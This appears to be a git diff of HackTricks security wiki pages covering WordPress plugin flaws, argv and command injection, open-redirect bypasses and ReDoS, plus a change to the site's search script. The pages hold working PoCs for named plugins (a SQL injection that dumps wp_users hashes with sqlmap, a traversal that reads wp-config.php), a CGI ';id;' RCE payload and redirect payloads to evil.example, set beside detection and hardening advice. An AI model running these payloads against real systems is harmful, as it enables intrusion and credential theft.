| - Reject unauthenticated access; avoid exposing nopriv AJAX actions for privileged flows | ||||
| 
 | ||||
| --- | ||||
| 
 | ||||
| ## Unauthenticated SQLi via s search parameter in depicter-* actions (Depicter Slider ≤ 3.6.1) | ||||
| 
 | ||||
| Multiple depicter-* actions consumed the s (search) parameter and concatenated it into SQL queries without parameterization. | ||||
| 
 | ||||
| - Parameter: s (search) | ||||
| - Flaw: direct string concatenation in WHERE/LIKE clauses; no prepared statements/sanitization | ||||
| - Impact: database exfiltration (users, hashes), lateral movement | ||||
| 
 | ||||
| PoC | ||||
| 
 | ||||
| ```bash | ||||
| # Replace action with the affected depicter-* handler on the target | ||||
| curl -G "https://victim.tld/wp-admin/admin-ajax.php" \ | ||||
|   --data-urlencode 'action=depicter_search' \ | ||||
|   --data-urlencode "s=' UNION SELECT user_login,user_pass FROM wp_users-- -" | ||||
| ``` | ||||
| 
 | ||||
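Once a vulnerable depicter-* handler is confirmed, the same parameter can be handed to sqlmap for extraction (illustrative command; the action name is an assumption and must match the affected handler):

```bash
sqlmap -u "https://victim.tld/wp-admin/admin-ajax.php?action=depicter_search&s=test" \
       -p s --dbms=mysql --technique=U --batch \
       --dump -T wp_users -C user_login,user_pass
```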
| Detection checklist | ||||
| - Grep for depicter-* action handlers and direct use of $_GET['s'] or $_POST['s'] in SQL | ||||
| - Review custom queries passed to $wpdb->get_results()/query() concatenating s | ||||
| 
 | ||||
| Hardening | ||||
| - Always use $wpdb->prepare() or wpdb placeholders; reject unexpected metacharacters server-side | ||||
| - Add a strict allowlist for s and normalize to expected charset/length | ||||
| 
 | ||||
| --- | ||||
| 
 | ||||
| ## Unauthenticated Local File Inclusion via unvalidated template/file path (Kubio AI Page Builder ≤ 2.5.1) | ||||
| 
 | ||||
| Accepting attacker-controlled paths in a template parameter without normalization/containment allows reading arbitrary local files, and sometimes code execution if includable PHP/log files are pulled into runtime. | ||||
| 
 | ||||
| - Parameter: __kubio-site-edit-iframe-classic-template | ||||
| - Flaw: no normalization/allowlisting; traversal permitted | ||||
| - Impact: secret disclosure (wp-config.php), potential RCE in specific environments (log poisoning, includable PHP) | ||||
| 
 | ||||
| PoC – read wp-config.php | ||||
| 
 | ||||
| ```bash | ||||
| curl -i "https://victim.tld/?__kubio-site-edit-iframe-classic-template=../../../../wp-config.php" | ||||
| ``` | ||||
| 
 | ||||
| Detection checklist | ||||
| - Any handler concatenating request paths into include()/require()/read sinks without realpath() containment | ||||
| - Look for traversal patterns (../) reaching outside the intended templates directory | ||||
| 
 | ||||
| Hardening | ||||
| - Enforce allowlisted templates; resolve with realpath() and require str_starts_with(realpath(file), realpath(allowed_base)) | ||||
| - Normalize input; reject traversal sequences and absolute paths; use sanitize_file_name() only for filenames (not full paths) | ||||
| 
 | ||||
| 
 | ||||
| ## References | ||||
| 
 | ||||
| - [Unauthenticated Arbitrary File Deletion Vulnerability in Litho Theme](https://patchstack.com/articles/unauthenticated-arbitrary-file-delete-vulnerability-in-litho-the/) | ||||
| @ -863,7 +925,11 @@ Patched behaviour (Jobmonster 4.8.0) | ||||
| - [Hackers exploiting critical WordPress WooCommerce Payments bug](https://www.bleepingcomputer.com/news/security/hackers-exploiting-critical-wordpress-woocommerce-payments-bug/) | ||||
| - [Unpatched Privilege Escalation in Service Finder Bookings Plugin](https://patchstack.com/articles/unpatched-privilege-escalation-in-service-finder-bookings-plugin/) | ||||
| - [Service Finder Bookings privilege escalation – Patchstack DB entry](https://patchstack.com/database/wordpress/plugin/sf-booking/vulnerability/wordpress-service-finder-booking-6-0-privilege-escalation-vulnerability) | ||||
| 
 | ||||
| - [Unauthenticated Broken Authentication Vulnerability in WordPress Jobmonster Theme](https://patchstack.com/articles/unauthenticated-broken-authentication-vulnerability-in-wordpress-jobmonster-theme/) | ||||
| - [Q3 2025’s most exploited WordPress vulnerabilities and how RapidMitigate blocked them](https://patchstack.com/articles/q3-2025s-most-exploited-wordpress-vulnerabilities-and-how-patchstacks-rapidmitigate-blocked-them/) | ||||
| - [OttoKit (SureTriggers) ≤ 1.0.82 – Privilege Escalation (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/suretriggers/vulnerability/wordpress-suretriggers-1-0-82-privilege-escalation-vulnerability) | ||||
| - [FunnelKit Automations ≤ 3.5.3 – Unauthenticated arbitrary plugin installation (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/wp-marketing-automations/vulnerability/wordpress-recover-woocommerce-cart-abandonment-newsletter-email-marketing-marketing-automation-by-funnelkit-plugin-3-5-3-missing-authorization-to-unauthenticated-arbitrary-plugin-installation-vulnerability) | ||||
| - [Depicter Slider ≤ 3.6.1 – Unauthenticated SQLi via s parameter (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/depicter/vulnerability/wordpress-depicter-slider-plugin-3-6-1-unauthenticated-sql-injection-via-s-parameter-vulnerability) | ||||
| - [Kubio AI Page Builder ≤ 2.5.1 – Unauthenticated LFI (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/kubio/vulnerability/wordpress-kubio-ai-page-builder-plugin-2-5-1-unauthenticated-local-file-inclusion-vulnerability) | ||||
| 
 | ||||
| {{#include ../../banners/hacktricks-training.md}} | ||||
|  | ||||
| @ -158,6 +158,37 @@ execFile('/usr/bin/do-something', [ | ||||
| 
 | ||||
| Real-world case: *Synology Photos* ≤ 1.7.0-0794 was exploitable through an unauthenticated WebSocket event that placed attacker controlled data into `id_user` which was later embedded in an `exec()` call, achieving RCE (Pwn2Own Ireland 2024). | ||||
| 
 | ||||
| ### Argument/Option injection via leading hyphen (argv, no shell metacharacters) | ||||
| 
 | ||||
| Not all injections require shell metacharacters. If the application passes untrusted strings as arguments to a system utility (even with `execve`/`execFile` and no shell), many programs will still parse any argument that begins with `-` or `--` as an option. This lets an attacker flip modes, change output paths, or trigger dangerous behaviors without ever breaking into a shell. | ||||
| 
 | ||||
| Typical places where this appears: | ||||
| 
 | ||||
| - Embedded web UIs/CGI handlers that build commands like `ping <user>`, `tcpdump -i <iface> -w <file>`, `curl <url>`, etc. | ||||
| - Centralized CGI routers (e.g., `/cgi-bin/<something>.cgi` with a selector parameter like `topicurl=<handler>`) where multiple handlers reuse the same weak validator. | ||||
| 
 | ||||
| What to try: | ||||
| 
 | ||||
| - Provide values that start with `-`/`--` to be consumed as flags by the downstream tool. | ||||
| - Abuse flags that change behavior or write files, for example: | ||||
|   - `ping`: `-f`/`-c 100000` to stress the device (DoS) | ||||
|   - `curl`: `-o /tmp/x` to write arbitrary paths, `-K <url>` to load attacker-controlled config | ||||
|   - `tcpdump`: `-G 1 -W 1 -z /path/script.sh` to achieve post-rotate execution in unsafe wrappers | ||||
| - If the program supports `--` end-of-options, try to bypass naive mitigations that insert `--` in the wrong place (see the placement sketch below). | ||||
| 
 | ||||
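A quick illustration of why `--` placement matters (a sketch assuming the downstream binary uses a standard getopt-style parser, where `--` terminates option processing):

```bash
value='-f'                  # attacker-controlled parameter beginning with a hyphen

ping -c 1 "$value"          # vulnerable: -f is parsed as ping's flood option
ping -c 1 -- "$value"       # safer: after --, the value can only be a hostname
ping -c 1 "$value" --       # broken mitigation: -- arrives after the value was already parsed
```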
| Generic PoC shapes against centralized CGI dispatchers: | ||||
| 
 | ||||
| ``` | ||||
| POST /cgi-bin/cstecgi.cgi HTTP/1.1 | ||||
| Content-Type: application/x-www-form-urlencoded | ||||
| 
 | ||||
| # Flip options in a downstream tool via argv injection | ||||
| topicurl=<handler>&param=-n | ||||
| 
 | ||||
| # Unauthenticated RCE when a handler concatenates into a shell | ||||
| topicurl=setEasyMeshAgentCfg&agentName=;id; | ||||
| ``` | ||||
| 
 | ||||
| ## Brute-Force Detection List | ||||
| 
 | ||||
| 
 | ||||
| @ -173,5 +204,6 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject | ||||
| - [Extraction of Synology encrypted archives – Synacktiv 2025](https://www.synacktiv.com/publications/extraction-des-archives-chiffrees-synology-pwn2own-irlande-2024.html) | ||||
| - [PHP proc_open manual](https://www.php.net/manual/en/function.proc-open.php) | ||||
| - [HTB Nocturnal: IDOR → Command Injection → Root via ISPConfig (CVE‑2023‑46818)](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html) | ||||
| - [Unit 42 – TOTOLINK X6000R: Three New Vulnerabilities Uncovered](https://unit42.paloaltonetworks.com/totolink-x6000r-vulnerabilities/) | ||||
| 
 | ||||
| {{#include ../banners/hacktricks-training.md}} | ||||
|  | ||||
| @ -7,12 +7,23 @@ | ||||
| 
 | ||||
| ### Redirect to localhost or arbitrary domains | ||||
| 
 | ||||
| - If the app “allows only internal/whitelisted hosts”, try alternative host notations to hit loopback or internal ranges via the redirect target (a quick probe loop is sketched at the end of this subsection): | ||||
|   - IPv4 loopback variants: 127.0.0.1, 127.1, 2130706433 (decimal), 0x7f000001 (hex), 017700000001 (octal) | ||||
|   - IPv6 loopback variants: [::1], [0:0:0:0:0:0:0:1], [::ffff:127.0.0.1] | ||||
|   - Trailing dot and casing: localhost., LOCALHOST, 127.0.0.1. | ||||
|   - Wildcard DNS that resolves to loopback: lvh.me, sslip.io (e.g., 127.0.0.1.sslip.io), traefik.me, localtest.me. These are useful when only “subdomains of X” are allowed but host resolution still points to 127.0.0.1. | ||||
| - Network-path references often bypass naive validators that prepend a scheme or only check prefixes: | ||||
|   - //attacker.tld → interpreted as scheme-relative and navigates off-site with the current scheme. | ||||
| - Userinfo tricks defeat contains/startswith checks against trusted hosts: | ||||
|   - https://trusted.tld@attacker.tld/ → browser navigates to attacker.tld but simple string checks “see” trusted.tld. | ||||
| - Backslash parsing confusion between frameworks/browsers: | ||||
|   - https://trusted.tld\@attacker.tld → some backends treat “\” as a path char and pass validation; browsers normalize to “/” and interpret trusted.tld as userinfo, sending users to attacker.tld. This also appears in Node/PHP URL-parser mismatches. | ||||
| 
 | ||||
| {{#ref}} | ||||
| ssrf-server-side-request-forgery/url-format-bypass.md | ||||
| {{#endref}} | ||||
| 
 | ||||
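A quick probe loop over several of these notations (a sketch; the endpoint `https://target.tld/redirect` and the parameter name `url` are assumptions, so swap in the real redirect parameter):

```bash
while read -r p; do
  loc=$(curl -skG -o /dev/null -D - "https://target.tld/redirect" \
          --data-urlencode "url=${p}" | grep -i '^location:')
  printf '%-45s -> %s\n' "$p" "${loc:-no redirect}"
done <<'EOF'
//evil.example
https://trusted.example@evil.example/
https://trusted.example\@evil.example/
http://127.1
http://[::1]
http://127.0.0.1.sslip.io
EOF
```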
| ### Open Redirect to XSS | ||||
| ### Modern open-redirect to XSS pivots | ||||
| 
 | ||||
| ```bash | ||||
| #Basic payload, javascript code is executed after "javascript:" | ||||
| @ -60,6 +71,34 @@ javascript://whitelisted.com?%a0alert%281%29 | ||||
| ";alert(0);// | ||||
| ``` | ||||
| 
 | ||||
| <details> | ||||
| <summary>More modern URL-based bypass payloads</summary> | ||||
| 
 | ||||
| ```text | ||||
| # Scheme-relative (current scheme is reused) | ||||
| //evil.example | ||||
| 
 | ||||
| # Credentials (userinfo) trick | ||||
| https://trusted.example@evil.example/ | ||||
| 
 | ||||
| # Backslash confusion (server validates, browser normalizes) | ||||
| https://trusted.example\@evil.example/ | ||||
| 
 | ||||
| # Schemeless with whitespace/control chars | ||||
| evil.example%00 | ||||
| %09//evil.example | ||||
| 
 | ||||
| # Prefix/suffix matching flaws | ||||
| https://trusted.example.evil.example/ | ||||
| https://evil.example/trusted.example | ||||
| 
 | ||||
| # When only path is accepted, try breaking absolute URL detection | ||||
| /\\evil.example | ||||
| /..//evil.example | ||||
| ``` | ||||
| </details> | ||||
| 
 | ||||
| ## Open Redirect uploading svg files | ||||
| 
 | ||||
| ```html | ||||
| @ -173,18 +212,78 @@ exit; | ||||
| ?> | ||||
| ``` | ||||
| 
 | ||||
| ## Hunting and exploitation workflow (practical) | ||||
| 
 | ||||
| - Single URL check with curl: | ||||
| 
 | ||||
| ```bash | ||||
| curl -s -I "https://target.tld/redirect?url=//evil.example" | grep -i "^Location:" | ||||
| ``` | ||||
| 
 | ||||
| - Discover and fuzz likely parameters at scale: | ||||
| 
 | ||||
| <details> | ||||
| <summary>Click to expand</summary> | ||||
| 
 | ||||
| ```bash | ||||
| # 1) Gather historical URLs, keep those with common redirect params | ||||
| cat domains.txt \ | ||||
|   | gau --o urls.txt            # or: waybackurls / katana / hakrawler | ||||
| 
 | ||||
| # 2) Grep common parameters and normalize list | ||||
| rg -NI "(url=|next=|redir=|redirect|dest=|rurl=|return=|continue=)" urls.txt \ | ||||
|   | sed 's/\r$//' | sort -u > candidates.txt | ||||
| 
 | ||||
| # 3) Use OpenRedireX to fuzz with payload corpus | ||||
| cat candidates.txt | openredirex -p payloads.txt -k FUZZ -c 50 > results.txt | ||||
| 
 | ||||
| # 4) Manually verify interesting hits | ||||
| grep -iE '30[1237]|location:' results.txt | ||||
| ``` | ||||
| </details> | ||||
| 
 | ||||
| - Don’t forget client-side sinks in SPAs: look for window.location/assign/replace and framework helpers that read query/hash and redirect. | ||||
| 
 | ||||
| - Frameworks often introduce footguns when redirect destinations are derived from untrusted input (query params, Referer, cookies). See Next.js notes about redirects and avoid dynamic destinations derived from user input. | ||||
| 
 | ||||
| {{#ref}} | ||||
| ../network-services-pentesting/pentesting-web/nextjs.md | ||||
| {{#endref}} | ||||
| 
 | ||||
| - OAuth/OIDC flows: abusing open redirectors frequently escalates to account takeover by leaking authorization codes/tokens. See dedicated guide: | ||||
| 
 | ||||
| {{#ref}} | ||||
| ./oauth-to-account-takeover.md | ||||
| {{#endref}} | ||||
| 
 | ||||
| - Server responses that implement redirects without Location (meta refresh/JavaScript) are still exploitable for phishing and can sometimes be chained. Grep for: | ||||
| 
 | ||||
| ```html | ||||
| <meta http-equiv="refresh" content="0;url=//evil.example"> | ||||
| <script>location = new URLSearchParams(location.search).get('next')</script> | ||||
| ``` | ||||
| 
 | ||||
| ## Tools | ||||
| 
 | ||||
| - [https://github.com/0xNanda/Oralyzer](https://github.com/0xNanda/Oralyzer) | ||||
| - OpenRedireX – fuzzer for detecting open redirects. Example: | ||||
| 
 | ||||
| ## Resources | ||||
| ```bash | ||||
| # Install | ||||
| git clone https://github.com/devanshbatham/OpenRedireX && cd OpenRedireX && ./setup.sh | ||||
| 
 | ||||
| - In [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect) you can find fuzzing lists. | ||||
| # Fuzz a list of candidate URLs (use FUZZ as placeholder) | ||||
| cat list_of_urls.txt | ./openredirex.py -p payloads.txt -k FUZZ -c 50 | ||||
| ``` | ||||
| 
 | ||||
| ## References | ||||
| 
 | ||||
| - In https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect you can find fuzzing lists. | ||||
| - [https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html) | ||||
| - [https://github.com/cujanovic/Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads) | ||||
| - [https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a](https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a) | ||||
| 
 | ||||
| - PortSwigger Web Security Academy – DOM-based open redirection: https://portswigger.net/web-security/dom-based/open-redirection | ||||
| - OpenRedireX – A fuzzer for detecting open redirect vulnerabilities: https://github.com/devanshbatham/OpenRedireX | ||||
| 
 | ||||
| {{#include ../banners/hacktricks-training.md}} | ||||
| 
 | ||||
| 
 | ||||
|  | ||||
| @ -8,7 +8,12 @@ A **Regular Expression Denial of Service (ReDoS)** happens when someone takes ad | ||||
| 
 | ||||
| ## The Problematic Regex Naïve Algorithm | ||||
| 
 | ||||
| **Check the details in [https://owasp.org/www-community/attacks/Regular*expression_Denial_of_Service*-\_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)** | ||||
| **Check the details in [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)** | ||||
| 
 | ||||
| ### Engine behavior and exploitability | ||||
| 
 | ||||
| - Most popular engines (PCRE, Java `java.util.regex`, Python `re`, JavaScript `RegExp`) use a **backtracking** VM. Crafted inputs that create many overlapping ways to match a subpattern force exponential or high-polynomial backtracking. | ||||
| - Some engines/libraries are designed to be **ReDoS-resilient** by construction (no backtracking), e.g. **RE2** and ports based on finite automata that provide worst‑case linear time; using them for untrusted input removes the backtracking DoS primitive. See the references at the end for details. | ||||
| 
 | ||||
| ## Evil Regexes <a href="#evil-regexes" id="evil-regexes"></a> | ||||
| 
 | ||||
| @ -18,10 +23,36 @@ An evil regular expression pattern is that one that can **get stuck on crafted i | ||||
| - ([a-zA-Z]+)\* | ||||
| - (a|aa)+ | ||||
| - (a|a?)+ | ||||
| - (.\*a){x} for x > 10 | ||||
| - (.*a){x} for x > 10 | ||||
| 
 | ||||
| All those are vulnerable to the input `aaaaaaaaaaaaaaaaaaaaaaaa!`. | ||||
| 
 | ||||
| ### Practical recipe to build PoCs | ||||
| 
 | ||||
| Most catastrophic cases follow this shape: | ||||
| 
 | ||||
| - Prefix that gets you into the vulnerable subpattern (optional). | ||||
| - Long run of a character that causes ambiguous matches inside nested/overlapping quantifiers (e.g., many `a`, `_`, or spaces). | ||||
| - A final character that forces overall failure so the engine must backtrack through all possibilities (often a character that won’t match the last token, like `!`). | ||||
| 
 | ||||
| Minimal examples: | ||||
| 
 | ||||
| - `(a+)+$` vs input `"a"*N + "!"` | ||||
| - `\w*_*\w*$` vs input `"v" + "_"*N + "!"` | ||||
| 
 | ||||
| Increase N and observe super‑linear growth. | ||||
| 
 | ||||
| #### Quick timing harness (Python) | ||||
| 
 | ||||
| ```python | ||||
| import re, time | ||||
| pat = re.compile(r'(\w*_)\w*$') | ||||
| for n in [2**k for k in range(8, 15)]: | ||||
|     s = 'v' + '_'*n + '!' | ||||
|     t0=time.time(); pat.search(s); dt=time.time()-t0 | ||||
|     print(n, f"{dt:.3f}s") | ||||
| ``` | ||||
| 
 | ||||
| ## ReDoS Payloads | ||||
| 
 | ||||
| ### String Exfiltration via ReDoS | ||||
| @ -30,7 +61,7 @@ In a CTF (or bug bounty) maybe you **control the Regex a sensitive information ( | ||||
| 
 | ||||
| - In [**this post**](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets) you can find this ReDoS rule: `^(?=<flag>)((.*)*)*salt$` | ||||
|   - Example: `^(?=HTB{sOmE_fl§N§)((.*)*)*salt$` | ||||
| - In [**this writeup**](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html) you can find this one:`<flag>(((((((.*)*)*)*)*)*)*)!` | ||||
| - In [**this writeup**](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20@%20DEKRA%20CTF%202022/solver/solver.html) you can find this one:`<flag>(((((((.*)*)*)*)*)*)*)!` | ||||
| - In [**this writeup**](https://ctftime.org/writeup/25869) he used: `^(?=${flag_prefix}).*.*.*.*.*.*.*.*!!!!$` | ||||
| 
 | ||||
| ### ReDoS Controlling Input and Regex | ||||
| @ -67,19 +98,35 @@ Regexp (a+)*$ took 723 milliseconds. | ||||
| */ | ||||
| ``` | ||||
| 
 | ||||
| ### Language/engine notes for attackers | ||||
| 
 | ||||
| - JavaScript (browser/Node): Built‑in `RegExp` is a backtracking engine and commonly exploitable when regex+input are attacker‑influenced. | ||||
| - Python: `re` is backtracking. Long ambiguous runs plus a failing tail often yield catastrophic backtracking. | ||||
| - Java: `java.util.regex` is backtracking. If you only control input, look for endpoints using complex validators; if you control patterns (e.g., stored rules), ReDoS is usually trivial. | ||||
| - Engines such as **RE2/RE2J/RE2JS** or the **Rust regex** crate are designed to avoid catastrophic backtracking. If you hit these, focus on other bottlenecks (e.g., enormous patterns) or find components still using backtracking engines. | ||||
| 
 | ||||
| ## Tools | ||||
| 
 | ||||
| - [https://github.com/doyensec/regexploit](https://github.com/doyensec/regexploit) | ||||
|   - Find vulnerable regexes and auto‑generate evil inputs. Examples: | ||||
|     - `pip install regexploit` | ||||
|     - Analyze one pattern interactively: `regexploit` | ||||
|     - Scan Python/JS code for regexes: `regexploit-py path/` and `regexploit-js path/` | ||||
| - [https://devina.io/redos-checker](https://devina.io/redos-checker) | ||||
| - [https://github.com/davisjam/vuln-regex-detector](https://github.com/davisjam/vuln-regex-detector) | ||||
|   - End‑to‑end pipeline to extract regexes from a project, detect vulnerable ones, and validate PoCs in the target language. Useful for hunting through large codebases. | ||||
| - [https://github.com/tjenkinson/redos-detector](https://github.com/tjenkinson/redos-detector) | ||||
|   - Simple CLI/JS library that reasons about backtracking to report if a pattern is safe. | ||||
| 
 | ||||
| > Tip: When you only control input, generate strings with doubling lengths (e.g., 2^k characters) and track latency. Exponential growth strongly indicates a viable ReDoS. | ||||
| 
 | ||||
| ## References | ||||
| 
 | ||||
| - [https://owasp.org/www-community/attacks/Regular*expression_Denial_of_Service*-\_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS) | ||||
| - [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS) | ||||
| - [https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets) | ||||
| - [https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html) | ||||
| - [https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20@%20DEKRA%20CTF%202022/solver/solver.html](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20@%20DEKRA%20CTF%202022/solver/solver.html) | ||||
| - [https://ctftime.org/writeup/25869](https://ctftime.org/writeup/25869) | ||||
| - SoK (2024): A Literature and Engineering Review of Regular Expression Denial of Service (ReDoS) — [https://arxiv.org/abs/2406.11618](https://arxiv.org/abs/2406.11618) | ||||
| - Why RE2 (linear‑time regex engine) — [https://github.com/google/re2/wiki/WhyRE2](https://github.com/google/re2/wiki/WhyRE2) | ||||
| 
 | ||||
| {{#include ../banners/hacktricks-training.md}} | ||||
| 
 | ||||
| 
 | ||||
| 
 | ||||
|  | ||||
| @ -48,7 +48,7 @@ Yes, you can, but **don't forget to mention the specific link(s)** where the con | ||||
| 
 | ||||
| > [!TIP] | ||||
| > | ||||
| > - **How can I  a page of HackTricks?** | ||||
| > - **How can I reference a page of HackTricks?** | ||||
| 
 | ||||
| As long as the link **to** the page(s) where you took the information from appears, it's enough.\ | ||||
| If you need a bibtex you can use something like: | ||||
|  | ||||
| @ -6,34 +6,63 @@ | ||||
| */ | ||||
| 
 | ||||
| (() => { | ||||
|   "use strict"; | ||||
|     "use strict"; | ||||
|    | ||||
|     /* ───────────── 0. helpers (main thread) ───────────── */ | ||||
|     const clear = el => { while (el.firstChild) el.removeChild(el.firstChild); }; | ||||
|    | ||||
|     /* ───────────── 1. Web‑Worker code ─────────────────── */ | ||||
|     const workerCode = ` | ||||
|       self.window = self; | ||||
|       self.search = self.search || {}; | ||||
|       const abs = p => location.origin + p; | ||||
|    | ||||
|       /* 1 — elasticlunr */ | ||||
|       try { importScripts('https://cdn.jsdelivr.net/npm/elasticlunr@0.9.5/elasticlunr.min.js'); } | ||||
|       catch { importScripts(abs('/elasticlunr.min.js')); } | ||||
|    | ||||
|     /* 2 — decompress gzip data */ | ||||
|     async function decompressGzip(arrayBuffer){ | ||||
|       if(typeof DecompressionStream !== 'undefined'){ | ||||
|         /* Modern browsers: use native DecompressionStream */ | ||||
|         const stream = new Response(arrayBuffer).body.pipeThrough(new DecompressionStream('gzip')); | ||||
|         const decompressed = await new Response(stream).arrayBuffer(); | ||||
|         return new TextDecoder().decode(decompressed); | ||||
|       } else { | ||||
|         /* Fallback: use pako library */ | ||||
|         if(typeof pako === 'undefined'){ | ||||
|           try { importScripts('https://cdn.jsdelivr.net/npm/pako@2.1.0/dist/pako.min.js'); } | ||||
|           catch(e){ throw new Error('pako library required for decompression: '+e); } | ||||
|         } | ||||
|         const uint8Array = new Uint8Array(arrayBuffer); | ||||
|         const decompressed = pako.ungzip(uint8Array, {to: 'string'}); | ||||
|         return decompressed; | ||||
|       } | ||||
|     } | ||||
| 
 | ||||
|   /* ───────────── 0. helpers (main thread) ───────────── */ | ||||
|   const clear = el => { while (el.firstChild) el.removeChild(el.firstChild); }; | ||||
| 
 | ||||
|   /* ───────────── 1. Web‑Worker code ─────────────────── */ | ||||
|   const workerCode = ` | ||||
|     self.window = self; | ||||
|     self.search = self.search || {}; | ||||
|     const abs = p => location.origin + p; | ||||
| 
 | ||||
|     /* 1 — elasticlunr */ | ||||
|     try { importScripts('https://cdn.jsdelivr.net/npm/elasticlunr@0.9.5/elasticlunr.min.js'); } | ||||
|     catch { importScripts(abs('/elasticlunr.min.js')); } | ||||
| 
 | ||||
|     /* 2 — load a single index (remote → local) */ | ||||
|     /* 3 — load a single index (remote → local) */ | ||||
|     async function loadIndex(remote, local, isCloud=false){ | ||||
|       let rawLoaded = false; | ||||
|       if(remote){ | ||||
|         /* Try ONLY compressed version from GitHub (remote already includes .js.gz) */ | ||||
|         try { | ||||
|           const r = await fetch(remote,{mode:'cors'}); | ||||
|           if (!r.ok) throw new Error('HTTP '+r.status); | ||||
|           importScripts(URL.createObjectURL(new Blob([await r.text()],{type:'application/javascript'}))); | ||||
|           rawLoaded = true; | ||||
|         } catch(e){ console.warn('remote',remote,'failed →',e); } | ||||
|           if (r.ok) { | ||||
|             const compressed = await r.arrayBuffer(); | ||||
|             const text = await decompressGzip(compressed); | ||||
|             importScripts(URL.createObjectURL(new Blob([text],{type:'application/javascript'}))); | ||||
|             rawLoaded = true; | ||||
|             console.log('Loaded compressed from GitHub:',remote); | ||||
|           } | ||||
|         } catch(e){ console.warn('compressed GitHub',remote,'failed →',e); } | ||||
|       } | ||||
|       /* If remote (GitHub) failed, fall back to local uncompressed file */ | ||||
|       if(!rawLoaded && local){ | ||||
|         try { importScripts(abs(local)); rawLoaded = true; } | ||||
|         try {  | ||||
|           importScripts(abs(local));  | ||||
|           rawLoaded = true; | ||||
|           console.log('Loaded local fallback:',local); | ||||
|         } | ||||
|         catch(e){ console.error('local',local,'failed →',e); } | ||||
|       } | ||||
|       if(!rawLoaded) return null;                 /* give up on this index */ | ||||
| @ -61,151 +90,159 @@ | ||||
| 
 | ||||
|       return local ? loadIndex(null, local, isCloud) : null; | ||||
|     } | ||||
|      | ||||
|     let built = []; | ||||
|     const MAX = 30, opts = {bool:'AND', expand:true}; | ||||
|      | ||||
|     self.onmessage = async ({data}) => { | ||||
|       if(data.type === 'init'){ | ||||
|         const lang = data.lang || 'en'; | ||||
|         const searchindexBase = 'https://raw.githubusercontent.com/HackTricks-wiki/hacktricks-searchindex/master'; | ||||
| 
 | ||||
|     (async () => { | ||||
|       const htmlLang = (document.documentElement.lang || 'en').toLowerCase(); | ||||
|       const lang = htmlLang.split('-')[0]; | ||||
|       const mainReleaseBase = 'https://github.com/HackTricks-wiki/hacktricks/releases/download'; | ||||
|       const cloudReleaseBase = 'https://github.com/HackTricks-wiki/hacktricks-cloud/releases/download'; | ||||
|         /* Remote sources are .js.gz (compressed), local fallback is .js (uncompressed) */ | ||||
|         const mainFilenames = Array.from(new Set(['searchindex-' + lang + '.js.gz', 'searchindex-en.js.gz'])); | ||||
|         const cloudFilenames = Array.from(new Set(['searchindex-cloud-' + lang + '.js.gz', 'searchindex-cloud-en.js.gz'])); | ||||
| 
 | ||||
|       const mainTags = Array.from(new Set([\`searchindex-\${lang}\`, 'searchindex-en', 'searchindex-master']));
 | ||||
|       const cloudTags = Array.from(new Set([\`searchindex-\${lang}\`, 'searchindex-en', 'searchindex-master']));
 | ||||
|         const MAIN_REMOTE_SOURCES  = mainFilenames.map(function(filename) { return searchindexBase + '/' + filename; }); | ||||
|         const CLOUD_REMOTE_SOURCES = cloudFilenames.map(function(filename) { return searchindexBase + '/' + filename; }); | ||||
| 
 | ||||
|       const MAIN_REMOTE_SOURCES  = mainTags.map(tag => \`\${mainReleaseBase}/\${tag}/searchindex.js\`);
 | ||||
|       const CLOUD_REMOTE_SOURCES = cloudTags.map(tag => \`\${cloudReleaseBase}/\${tag}/searchindex.js\`);
 | ||||
| 
 | ||||
|       const indices = []; | ||||
|       const main = await loadWithFallback(MAIN_REMOTE_SOURCES , '/searchindex.js',        false); if(main)  indices.push(main); | ||||
|       const cloud= await loadWithFallback(CLOUD_REMOTE_SOURCES, '/searchindex-cloud.js',  true ); if(cloud) indices.push(cloud); | ||||
| 
 | ||||
|       if(!indices.length){ postMessage({ready:false, error:'no-index'}); return; } | ||||
| 
 | ||||
|       /* build index objects */ | ||||
|       const built = indices.map(d => ({ | ||||
|         idx : elasticlunr.Index.load(d.json), | ||||
|         urls: d.urls, | ||||
|         cloud: d.cloud, | ||||
|         base: d.cloud ? 'https://cloud.hacktricks.wiki/' : '' | ||||
|       })); | ||||
| 
 | ||||
|       postMessage({ready:true}); | ||||
|       const MAX = 30, opts = {bool:'AND', expand:true}; | ||||
| 
 | ||||
